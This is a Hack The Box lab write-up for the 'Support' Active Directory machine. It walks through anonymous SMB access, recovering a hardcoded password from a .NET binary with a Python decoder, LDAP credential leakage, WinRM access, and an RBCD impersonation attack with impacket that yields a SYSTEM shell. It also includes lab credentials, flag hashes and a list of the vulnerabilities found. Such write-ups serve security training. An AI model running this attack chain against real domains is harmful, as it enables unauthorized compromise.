← ./writeups

Hack The Box

Support

HTBEasyWindowsActive DirectorySMBLDAPRBCD

Summary

Support is an Easy Windows Active Directory machine. An anonymous SMB share exposes a custom UserInfo.exe tool whose .NET binary contains a hardcoded, XOR+Base64-"encrypted" password for the ldap account. Authenticated LDAP queries reveal the support user's password in the info attribute, granting WinRM access. BloodHound shows support has GenericAll over the Domain Controller object, which is abused via Resource-Based Constrained Delegation (RBCD) to impersonate Administrator and compromise the DC.

Machine Information

NameDifficultyOSPlatform
SupportEasyWindowsHack The Box

Attack Path

  1. Nmap identifies a Windows Domain Controller (Kerberos, LDAP, SMB).
  2. Anonymous SMB enumeration finds the support-tools share.
  3. UserInfo.exe is downloaded and decompiled with ilspycmd.
  4. A hardcoded password and its XOR+Base64 routine are recovered.
  5. The routine is reimplemented in Python to recover the ldap password.
  6. Authenticated LDAP reveals the support password in the info attribute.
  7. WinRM access is obtained as support.
  8. SharpHound/BloodHound reveal GenericAll over DC$.
  9. RBCD is configured and used to impersonate Administrator.
  10. The root flag is read on the Domain Controller.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.55.108

Nmap Scan

The host was a Windows Domain Controller exposing DNS (53), Kerberos (88), LDAP (389/636/3268), SMB (445), WinRM (5985) and related services. LDAP revealed the domain support.htb and host dc.support.htb, which were added to /etc/hosts.

SMB Enumeration

SMB shares were listed with an anonymous session:

smbclient -L //10.129.55.108/ -N

SMB share list

A custom share support-tools ("support staff tools") allowed anonymous access:

smbclient //10.129.55.108/support-tools -U Anonymous -N

support-tools share

Among the portable tools, the custom UserInfo.exe.zip stood out and was downloaded for analysis.

Binary Analysis — UserInfo.exe

UserInfo.exe was a .NET application, decompiled with ilspycmd:

ilspycmd -p -o decompiled UserInfo.exe

ilspycmd

Hardcoded password

Protected.cs contained an encrypted password and the key used to protect it:

Hardcoded password

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E=";
private static byte[] key = Encoding.ASCII.GetBytes("armando");

public static string getPassword()
{
    byte[] array = Convert.FromBase64String(enc_password);
    for (int i = 0; i < array.Length; i++)
        array[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
    return Encoding.Default.GetString(array);
}

The routine Base64-decodes the value, XORs each byte with the key armando, then XORs with 0xDF.

Recovering the password

The routine was reimplemented in Python:

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E="
key = b"armando"

data = base64.b64decode(enc_password)
password = bytes((data[i] ^ key[i % len(key)]) ^ 0xDF for i in range(len(data)))
print(password.decode())

Recovered password

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

LdapQuery.cs confirmed the credential belonged to support\ldap, which bound to LDAP using this password.

LdapQuery.cs

LDAP Enumeration

With the ldap credentials, authenticated LDAP queries were possible. Searching the support user's attributes:

ldapsearch -x -H ldap://10.129.55.108 \
  -D 'support\ldap' \
  -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  -b 'dc=support,dc=htb' \
  '(sAMAccountName=support)' '*'

LDAP search

The info attribute leaked a plaintext password — a classic AD anti-pattern:

info: Ironside47pleasure40Watchful

Initial Access

support was a member of Remote Management Users, so WinRM access was possible:

evil-winrm -i 10.129.55.108 -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM

Privilege Escalation

BloodHound — GenericAll over DC$

SharpHound was uploaded and run to collect AD data:

upload SharpHound.exe
./SharpHound.exe -c All --zipfilename support_data

SharpHound

In BloodHound, with support marked owned, the attack path was clear:

BloodHound

SUPPORT --[MemberOf]--> SHARED SUPPORT ACCOUNTS --[GenericAll]--> DC.SUPPORT.HTB

GenericAll over the DC$ computer object allows writing msDS-AllowedToActOnBehalfOfOtherIdentity — the basis for RBCD.

RBCD attack

Step 1 — Create a fake computer (default MachineAccountQuota=10 allows it):

impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'FakePass123!' \
  -dc-ip 10.129.55.234 'support.htb/support:Ironside47pleasure40Watchful'

Add computer

Step 2 — Configure RBCD on DC$:

impacket-rbcd -delegate-from 'FAKE01$' -delegate-to 'DC$' -action 'write' \
  -dc-ip 10.129.55.234 'support.htb/support:Ironside47pleasure40Watchful'

RBCD write

Step 3 — Request a TGS impersonating Administrator:

impacket-getST -spn 'cifs/dc.support.htb' -impersonate 'Administrator' \
  -dc-ip 10.129.55.234 'support.htb/FAKE01$:FakePass123!'

This performed S4U2Self + S4U2Proxy and saved a ticket for Administrator.

Step 4 — Access the DC as Administrator:

export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
impacket-psexec -k -no-pass dc.support.htb

Root shell

This returned a SYSTEM shell on the Domain Controller.

Flags

User

type C:\Users\support\Desktop\user.txt

User flag

b96cb011d9fce6c42f5ae4fa9625e4b9

Root

type C:\Users\Administrator\Desktop\root.txt

Root flag

bb3442b0343a5d2a27d89eee89fddb86

Vulnerabilities Identified

Anonymous SMB Share Access

Impact: disclosure of a custom tool containing embedded credentials.

Hardcoded Password in .NET Binary

Impact: trivially reversible; equivalent to storing the password in plaintext.

Plaintext Password in AD info Attribute

Impact: any authenticated user could recover the credential.

GenericAll over the Domain Controller

Impact: impersonation of any domain user, including Administrator.

Default MachineAccountQuota

Impact: a prerequisite that enabled the RBCD attack.

Tools Used

Key Takeaways